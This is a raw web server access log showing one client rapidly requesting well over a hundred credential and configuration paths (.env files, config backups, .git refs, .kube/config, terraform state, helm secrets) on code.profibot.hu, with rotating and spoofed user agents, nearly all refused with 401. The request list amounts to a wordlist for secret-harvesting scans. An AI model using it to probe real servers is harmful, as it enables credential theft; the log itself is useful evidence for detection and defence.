+[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/wp-config.php.orig" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/assets/js/app.js" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/services.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/digitalocean/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/production.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.htaccess.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/magento/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/packages/prod/doctrine.yaml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/sites/default/settings.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.local.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/sites/default/settings.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/sites/default/settings.local.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/rest/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/sites/default/files/.htaccess" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/var/cache/prod/App_KernelProdContainer.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/sites/all/modules/" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/app/etc/env.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/app/etc/config.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/app/etc/env.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/pub/errors/local.xml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/var/log/system.log" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/var/log/exception.log" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/app/config/parameters.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/settings.inc.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/modules/contrib/" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/var/log/debug.log" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/application/config/config.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/app/config/parameters.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/settings.inc.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/assets/js/main.js" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/js/app.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/app/Config/App.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/app.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/graphql/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/js/config.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/web.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/laravel/.env.production" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/db.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/common/config/main-local.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/main.js.map" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/app.js.map" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/wordpress/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/vendor.js.map" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/logs/error.log" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/debug.log" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/php_errors.log" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/error.log" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/logs/debug.log" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/app/logs/dev.log" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/app/logs/prod.log" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/logs/application.log" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/var/log/prod.log" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/error_log" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/webpack.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/log/error.log" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_nuxt/app.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/var/log/app.log" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/log/debug.log" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/log/app.log" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/express/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_nuxt/config.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/main.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/static/js/2.chunk.js" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_nuxt/vendors.app.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/static/js/main.chunk.js" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/FETCH_HEAD" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/src/constants.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/index.js" [Client 216.81.248.13] [Length 654] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/lib/config.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/keys.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/env.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/src/config.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/runtime-config.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/__ENV.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/window.env.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 216.81.248.13] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/settings.json" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/env.json" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config.json" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/@vite/client" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/keys.json" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git/refs/heads/dev" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/common/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/php_info.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.semaphore/semaphore.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/index.html" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/phpinfo.php5" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/artisan" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.github/workflows/deploy.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/public/js/main.js" [Client 216.81.248.13] [Length 661] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.testing" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/app_local.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.gitlab-ci.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/build/static/js/bundle.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/application/config/database.php.bak" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/secrets/prod/prod.decrypt.private.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/secrets/dev/dev.decrypt.private.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/var/cache/dev/App_KernelDevDebugContainer.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/js/main.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/src/env.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/server-info.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.travis.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.github/workflows/staging.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/docker-compose.yml" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config.sample.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/pi.php" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old2" [Client 216.81.248.13] [Length 650] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/development/pages/_app.js" [Client 216.81.248.13] [Length 657] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.bak10" [Client 216.81.248.13] [Length 650] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.old" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/deployment/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.docker/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_next/static/chunks/pages/_app.js" [Client 216.81.248.13] [Length 662] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.kube/config" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/constants.js" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.gcloud/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/payment/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.terraform/terraform.tfstate" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/shopify-app/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/public_html/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/helm/secrets.yaml" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/v2/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" 